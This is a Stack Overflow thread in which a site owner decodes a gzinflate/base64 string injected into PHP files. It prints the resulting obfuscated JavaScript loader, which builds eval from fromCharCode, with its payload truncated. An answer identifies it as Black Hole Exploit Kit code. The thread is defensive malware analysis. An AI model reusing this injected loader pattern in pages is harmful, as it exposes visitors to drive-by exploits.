2

I found several occurences of echo(gzinflate(base64_decode(".....") in various .php files and I am curious what it exactly does. I think I managed to decode the text in quotes using base64 -d < fileetje.b64 > fileetje.gz where fileetje.b64 contains the string data. But when I subsequently try to gunzip the fileetje.gz, it reports bad data. Also when doing a file fileetje.gz it says data, where I would expect GZIP'ed data are something similar.

How can I decrypt the data from the Linux command line?

An online decoder like http://www.base64online.com/ can't make sense of the code either. Is it safe to add the string data to the question too?

UPDATE: I improvized a php script as it is only a simple echo (Thnx: glglgl). This is what came out:

<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new document.getElementById("qwe").prototype}catch(qqq){st=String;zz='al';zz='v'+zz;ss="";if(1){f='f'+'r'+'o'+'m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n="3.5~3.5~51.5~50~15~19~49~54.5~48...............

And it ends in:

...........9~50~19.5~28.5~5.5~3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=563;i++){j=i;ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);</script>
Kara
  • 6,115
  • 16
  • 50
  • 57
jippie
  • 937
  • 5
  • 15
  • 33
  • 2
    hmmm... as it is just an echo command, it should be ok to execute just these lines. – glglgl Jun 02 '12 at 14:00
  • So if the encoded data is malicious javascript, that would be ok? I think not. – Jeremy Harris Jun 02 '12 at 14:02
  • It is not a gzip archive, but a gzip-compressed string. Try to download the content to your home webserver and test it. You can also post the full stuff here and let someone test it at home if you fear. – Whisperity Jun 02 '12 at 14:05
  • 1
    Can I uncompress such a string from the Linux command line? I managed using php, but I feel more comfortable with Linux commandline tools. – jippie Jun 02 '12 at 14:10
  • possible duplicate of [How to decode – mario Jun 02 '12 at 14:17
  • There's always php-cli: it might make some people recoil in horror as a general-purpose scripting tool, but for evaluating PHP expressions, it rules! You can call it with inline scripts just like perl or sed, or on small files. – Nicholas Wilson Jun 02 '12 at 15:13
  • @mario: Duplicate or not, my initial question was about how to decode the string using Linux command line tools. I didn't realize it was safe to run it from interactive php. I wasn't able to figure that out from any of the other questions I visited. – jippie Jun 02 '12 at 15:20

1 Answers1

2

The embedded javascript follows the format for the Black Hole Exploit kit. It injects an iFrame leading you to an exploit and can be bad news. Thinking that echo() (as stated above in a comment) is going to be safe is a not true. That function just puts the embedded malware code into your page to do it's damage.

Related SO Post: My wordpress site was hacked, anyone tell what this code does?

SO Post on How It Works: What is the purpose of this JavaScript hack?

Related Info:

http://johnbatchelorshow.com/jb/2012/01/lessons-learned-from-the-hacking-black-hole-exploit-kit/

http://nakedsecurity.sophos.com/2012/03/29/exploring-the-blackhole-exploit-kit/

Community
  • 1
  • 1
Jeremy Harris
  • 24,318
  • 13
  • 79
  • 133
  • `echo` is perfectly safe when being used from the command line. I agree that it is unsafe when calling it from a webbrowser. – jippie Jun 02 '12 at 15:22